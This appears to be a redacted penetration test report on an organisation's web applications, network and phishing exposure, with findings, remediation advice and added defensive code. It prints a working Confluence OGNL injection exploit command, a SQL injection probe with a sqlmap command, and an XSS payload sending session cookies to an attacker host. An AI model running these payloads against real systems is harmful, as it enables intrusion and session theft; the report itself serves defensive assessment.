CONFIDENTIAL
Client ██████████████████████████

External Penetration Test
& Web Application
Security Assessment

Network Penetration Test · Web Application Security Assessment · Phishing Simulation

Assessment Period August 16 — September 1, 2021
Report Date September 2021
Performed By Red Team Security SRL
Version 1.0 — Final
RED TEAM SECURITY SRL · Confidential & Proprietary
This document contains sensitive security findings. Distribution is strictly controlled.
www.redteamsec.eu
// 01

Engagement Overview

Client: [CLIENT] — Large Intergovernmental Organization
Engagement Type: External Network Penetration Test · Web Application Security Assessment · Phishing Simulation
Testing Period: August 16 – September 1, 2021
Report Date: September 2, 2021
Engagement Lead: Red Team Security SRL
Testing Approach: Black-box — No credentials or prior knowledge of client infrastructure provided
Scope: All assets under [client-domain].org excluding ERP infrastructure
Phishing: Authorized
Denial of Service: Out of Scope

1.1 Introduction

[CLIENT] engaged Red Team Security SRL to perform both a Network Penetration Test and a Web Application Security Assessment across their public-facing assets. No credentials or prior infrastructure knowledge were provided. The scope covered everything under [client-domain].org, excluding the ERP systems. Phishing campaigns were authorized; denial-of-service testing was excluded by agreement of both parties.

This report documents the high and critical findings uncovered during the engagement, along with general recommendations for remediation. The assessment ran from August 16 to September 1, 2021, and used two primary attack vectors: spear-phishing campaigns targeting employees, and direct exploitation of vulnerabilities in public-facing web applications.

1.2 Objective

The objectives of this assessment, as agreed with the client:

No disruption or outage was to be caused to client services or applications throughout the engagement.

// 02

Executive Summary

The penetration test was conducted without credentials or prior knowledge of the client's infrastructure. Two attack vectors were used: a spear-phishing campaign and direct exploitation of public-facing web applications.

Approximately 50 users were targeted across three phishing campaigns. The security team was quick to identify and report suspicious emails, and [CLIENT]'s existing multi-factor authentication (MFA) on Office 365 prevented immediate access in most cases. However, in one campaign, a user approved an MFA push notification triggered by our team, granting full Office 365 access, the ability to add secondary MFA devices, and — critically — access to the corporate VPN without any additional authentication factor.

On the web application front, critical and high-severity vulnerabilities were found across multiple public-facing properties. Outdated software resulted in remote code execution on two separate applications. Multiple other applications were vulnerable to SQL injection and cross-site scripting. The container-based hosting architecture limited the blast radius of these vulnerabilities — but they represent real, exploitable risk that a motivated attacker would chain together.

Scanning and enumeration activities went largely undetected throughout the engagement, which indicates that detection of reconnaissance-phase activities needs significant improvement.

2.1 Findings Summary

Totals by instance count: 4 Critical · 1 High · 4 Medium

ID | Severity | Category | Description | Count
F-01 | Critical | Remote Code Execution | Applications running outdated software with known critical CVEs allow unauthenticated remote code execution, giving full server control to an attacker. | 2
F-02 | Critical | SQL Injection | Improper user input sanitization allows SQL statements to be injected, enabling database enumeration and data exfiltration. | 2
F-03 | High | Monitoring | Failure to detect early signs of attack reduces capability for limiting disruption and increases overall response cost. | 1
F-04 | Medium | Phishing | Spear-phishing campaigns tricked users into disclosing credentials, which is a primary vector for attackers to gain initial access to internal environments. | 1
F-05 | Medium | Cross-Site Scripting | Improper output escaping allows JavaScript injection into page content, enabling session hijacking and keystroke logging in realistic attack scenarios. | 2
F-06 | Medium | Remote Access | The VPN portal does not require a second authentication factor, allowing network access using only phished credentials. | 1

2.2 Remediation Prioritization

The following matrix maps findings by risk reduction impact and implementation effort:

Quick Wins
  • Deploy WAF in front of all affected web applications
  • Install and apply Content Security Policy (CSP) headers
  • Run Security Awareness training focused on phishing
  • Enable internal network scanning detection and alerting
Important Projects
  • Establish a Patch Management program
  • Implement a Vulnerability Management program
  • Launch an Application Security program
Nice to Have
  • Enable Kerberos pre-authentication failure alerting
  • Monitor LDAP query volumes for anomalies
  • Ask users to review authorized MFA devices
  • Implement VPN geo-location alerting
Final Considerations
  • Run secure code reviews across affected web properties
  • Review and clean up public DNS records for unused assets
  • Review VPN network filtering and access rules
(Matrix horizontal axis: ◄ Low Implementation Effort … High Implementation Effort ►)

2.3 Strengths & Weaknesses

Strengths
  • Office 365 MFA was in place across user accounts
  • Service accounts running web applications operated with limited permissions
  • Admin passwords were distinct from standard user passwords
  • Servers were not vulnerable to EternalBlue (MS17-010)
Weaknesses
  • Outdated software versions in production across multiple web properties
  • VPN access did not require a second authentication factor
  • No detection of internal network scanning activities
  • No detection of Kerberos password spray attempts
  • No WAF deployed in front of web applications vulnerable to SQL injection
  • Multiple web properties vulnerable to OWASP Top 10 vulnerabilities
// 03

Technical Details

3.1 Attack Narrative

The engagement used two parallel attack vectors: spear-phishing campaigns targeting employees, and direct exploitation of vulnerabilities on public-facing web applications.

The phishing campaigns used a registered lookalike domain and mirrored several legitimate [CLIENT] web properties to capture credentials. Two Active Directory credentials were obtained, but MFA blocked immediate use in most cases. In one instance, a user approved an MFA push notification we triggered, granting full Office 365 access including email, SharePoint, and Teams. From the O365 session, we found a portal for installing Pulse Secure VPN. Notably, the VPN required no additional credentials or OTP after installation — granting us access to the internal network.

Once inside the internal network, full port and service enumeration was performed, along with complete LDAP exfiltration — all without triggering any defensive mechanisms. We identified 4 domain controllers across two AD forests. While a print spooler vulnerability appeared exploitable on domain controllers, exploitation was declined due to the disruption risk.
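The enumeration described above is exactly the activity the client's monitoring missed. The following detector is an added example written for this report's reader, not tooling used by Red Team Security SRL or the client: it reads connection records (a constructed, assumed "timestamp src= dst= dport=" format) and raises an alert when one source touches many ports on a host (vertical scan) or one port across many hosts (horizontal sweep, such as the LDAP enumeration) inside a short window. Thresholds and window are assumptions to tune per environment.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=60)  # assumed sliding window
PORT_THRESHOLD = 5              # distinct ports on one host: vertical scan
HOST_THRESHOLD = 8              # distinct hosts on one port: horizontal sweep
LINE_RE = re.compile(r"^(\S+) src=(\S+) dst=(\S+) dport=(\d+)$")

def _line(hhmmss, src, dst, port):
    return f"2021-08-20T{hhmmss} src={src} dst={dst} dport={port}"

# Constructed sample: one host probes six ports on a server, then sweeps port 389 (LDAP) across ten hosts; another host makes two normal HTTPS calls.
SAMPLE_LOG = "\n".join(
    [_line(f"10:00:{i:02d}", "10.0.5.23", "10.0.1.10", p)
     for i, p in enumerate([22, 80, 135, 139, 389, 445])]
    + [_line(f"10:00:{10 + i:02d}", "10.0.5.23", f"10.0.1.{20 + i}", 389)
       for i in range(10)]
    + [_line("10:01:00", "10.0.7.8", "10.0.1.10", 443),
       _line("10:05:00", "10.0.7.8", "10.0.1.10", 443)]
)

def parse(log_text):
    """Yield (time, src, dst, port) tuples; lines that do not match are skipped."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield datetime.fromisoformat(m[1]), m[2], m[3], int(m[4])

def detect_scans(log_text, window=WINDOW, port_threshold=PORT_THRESHOLD, host_threshold=HOST_THRESHOLD):
    """Return sorted (src, kind) alerts, kind being 'vertical' or 'horizontal'."""
    events = sorted(parse(log_text))
    alerts = set()
    for i, (t0, src, _, _) in enumerate(events):
        ports_per_dst = defaultdict(set)   # dst host -> ports touched by src
        dsts_per_port = defaultdict(set)   # port -> hosts touched by src
        for t, s, dst, port in events[i:]:  # events are time-ordered
            if t - t0 > window:
                break
            if s == src:
                ports_per_dst[dst].add(port)
                dsts_per_port[port].add(dst)
        if any(len(v) >= port_threshold for v in ports_per_dst.values()):
            alerts.add((src, "vertical"))
        if any(len(v) >= host_threshold for v in dsts_per_port.values()):
            alerts.add((src, "horizontal"))
    return sorted(alerts)
```

Running `detect_scans(SAMPLE_LOG)` flags 10.0.5.23 for both patterns and stays silent on 10.0.7.8; in production the same logic would sit on firewall, NetFlow or Zeek conn logs.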

On the web application side, two applications running outdated software were compromised via known CVEs (remote code execution). Additional applications were found to be vulnerable to SQL injection and cross-site scripting. Container-based hosting limited further lateral movement from these footholds.

// Asset Summary — Affected Web Properties

Application | Vulnerability | Remote Code Execution
[subdomain1].[client-domain].org | CVE-2020-35846, 35847, 35848 | Yes
[subdomain2].[client-domain].org | CVE-2021-26084 | Yes
[subdomain3].[client-domain].org | SQL Injection | No
[subdomain4].[client-domain].org | SQL Injection, Cross-Site Scripting | No
[subdomain5].[client-domain].org | Cross-Site Scripting | No

3.2 Phishing Campaigns

Four spear-phishing campaigns were run using a lookalike domain and mirrored versions of legitimate [CLIENT] web portals. Email templates were crafted for each campaign to match internal communication styles.

The second campaign — themed around payroll changes — targeted 9 users and resulted in 2 users submitting credentials. Using these credentials plus a user-approved MFA push request, our team obtained full Office 365 access and used the client's own VPN portal to connect to the internal network without needing any additional credentials.

// Captured Credentials (redacted for client report)

Username | Password (redacted)
[user1]@[client-domain].org | [REDACTED]
[user2]@[client-domain].org | [REDACTED]

// Evidence — Office 365 Full Access via Approved MFA Push

Figure: Office 365 Access via Phishing and MFA Approval

3.3 Web Application Technical Findings

F-01 · Critical · Remote Code Execution — Outdated CMS Software

CVE-2020-35846 · CVE-2020-35847 · CVE-2020-35848 · CVE-2021-26084

[subdomain1].[client-domain].org · [subdomain2].[client-domain].org

Two public-facing web applications were running outdated software versions with known, publicly disclosed remote code execution vulnerabilities. Exploitation requires no authentication and grants the attacker full control of the underlying server process.

Both applications were exploited using published proof-of-concept code targeting specific CVEs. The first target ran an outdated version of a content management system with an unauthenticated file-upload bypass. The second ran an outdated collaboration platform with a server-side template injection flaw that resulted in OS command execution.

# Exploitation of CVE-2021-26084 (Atlassian Confluence OGNL Injection)
curl -s 'https://[subdomain2].[client-domain].org/pages/doenterpagevariables.action' \
  --data-urlencode 'queryString=\u0027+\u007b\u0027class\u0027.forName(\u0027java.lang.Runtime\u0027).getMethod(\u0027exec\u0027,\u0027class\u0027.forName(\u0027java.lang.String\u0027)).invoke(\u0027class\u0027.forName(\u0027java.lang.Runtime\u0027).getMethod(\u0027getRuntime\u0027).invoke(null),\u0027id\u0027)\u007d+\u0027'
# Result: uid=999(confluence) gid=999(confluence) — code execution confirmed

Remediation: Update both applications to the latest vendor-supported version immediately. Implement a recurring patch management process that targets internet-facing systems within 7 days of a critical patch release. Deploy a Web Application Firewall (WAF) as a short-term mitigation layer while patching is in progress.

F-02 · Critical · SQL Injection — Direct Database Access

[subdomain3].[client-domain].org · [subdomain4].[client-domain].org

CWE-89: SQL Injection

User-supplied input is passed directly into database queries without parameterization or proper sanitization. This allows an attacker to craft SQL payloads that manipulate query logic, enumerate the database schema, and dump the contents of any accessible table.

Time-based blind SQL injection was confirmed across multiple input fields. Using automated enumeration, we were able to extract the full database schema and confirm access to user data including stored credentials.

# Time-based blind SQL injection — confirming vulnerability
GET /search?q=test' AND SLEEP(5)--
# Response delayed 5 seconds — injection confirmed

# Database enumeration via sqlmap
sqlmap -u "https://[subdomain3].[client-domain].org/search?q=test" \
  --dbs --batch --level=5

Remediation: Replace all dynamic query construction with parameterized queries or prepared statements. Deploy a WAF with SQL injection detection rules as an immediate mitigation. Conduct a full code review of all database-interacting components across the application.
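To make the remediation concrete, here is an added example (not the assessed application's code) showing the defect and its fix side by side: a string-built search query next to the same query with a bound parameter. SQLite stands in for the production database and the documents table is constructed; the input is the report's own time-based probe string.

```python
import sqlite3

PROBE = "test' AND SLEEP(5)-- "   # the report's probe, used here as plain input

def _db():
    """Constructed in-memory table standing in for the application's database."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE documents (id INTEGER PRIMARY KEY, title TEXT)")
    con.executemany("INSERT INTO documents (title) VALUES (?)",
                    [("test plan",), ("budget 2021",), ("latest test results",)])
    return con

def search_vulnerable(con, q):
    """String concatenation: the user's text becomes part of the SQL grammar."""
    sql = "SELECT title FROM documents WHERE title LIKE '%" + q + "%'"
    return [row[0] for row in con.execute(sql)]

def search_safe(con, q):
    """Bound parameter: the user's text can only ever be a string value."""
    sql = "SELECT title FROM documents WHERE title LIKE ?"
    return [row[0] for row in con.execute(sql, ("%" + q + "%",))]

def demo():
    """Return (outcome of the vulnerable query, rows from the safe query)."""
    con = _db()
    try:
        search_vulnerable(con, PROBE)
        vulnerable_outcome = "query ran"
    except sqlite3.OperationalError as e:
        # SLEEP() reached the SQL parser: user input changed the query's
        # structure, which is the defect regardless of the engine's response.
        vulnerable_outcome = f"parser error: {e}"
    safe_rows = search_safe(con, PROBE)  # [] : no title contains the literal text
    return vulnerable_outcome, safe_rows
```

On SQLite the injected call fails as an unknown function; on the MySQL-style engine implied by the report's SLEEP() probe the same concatenation produces the 5-second delay, while the parameterized version simply returns no rows.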

F-05 · Medium · Cross-Site Scripting (Reflected & Stored)

[subdomain4].[client-domain].org · [subdomain5].[client-domain].org

CWE-79: Cross-Site Scripting

User-supplied input is rendered in the browser without proper HTML encoding. This allows injection of arbitrary JavaScript code into the application's pages. In realistic attack scenarios, this is used to steal session cookies, log keystrokes, or redirect users to attacker-controlled sites.

# Reflected XSS — input reflected in page without encoding
GET /page?id=<script>document.location='https://attacker.tld/c?c='+document.cookie</script>
# Session cookie exfiltration — attacker captures authenticated session

Remediation: Implement output encoding on all user-supplied data rendered in HTML context. Apply a strict Content Security Policy (CSP) header that restricts inline script execution. Consider using a template engine with automatic escaping by default.
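The two controls above work together: encoding stops the injected markup from becoming a tag, and a nonce-based CSP means that even a tag that slipped through would not execute. The following response builder is an added example for the report's /page?id= endpoint, not the assessed application's code; the handler and helper names are assumptions, and the input is the report's own reflected XSS probe.

```python
import html
import secrets

PROBE = "<script>document.location='https://attacker.tld/c?c='+document.cookie</script>"

def render_page(page_id, nonce=None):
    """Build (headers, body) for GET /page?id=<page_id> with output encoding and CSP."""
    nonce = nonce or secrets.token_urlsafe(16)   # fresh per response
    # HTML-body context: every user-controlled character is entity-encoded,
    # including quotes, so the value cannot close the element or start a tag.
    safe_id = html.escape(page_id, quote=True)
    body = (
        "<html><body>\n"
        f"<h1>Page {safe_id}</h1>\n"
        # Only scripts carrying this response's nonce are allowed to run.
        f'<script nonce="{nonce}">console.log("app loaded")</script>\n'
        "</body></html>"
    )
    headers = {
        "Content-Type": "text/html; charset=utf-8",
        "Content-Security-Policy": (
            f"default-src 'self'; script-src 'nonce-{nonce}'; "
            "object-src 'none'; base-uri 'none'"
        ),
    }
    return headers, body

def reflects_raw_script(body):
    """True if an unencoded <script> tag is present (the vulnerable behaviour)."""
    return "<script>" in body
```

Without `html.escape` the probe would be emitted verbatim; with it, the browser shows the probe as text, and the CSP rejects any inline script that lacks the nonce.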

External PT & Web App Assessment · September 2021 · Confidential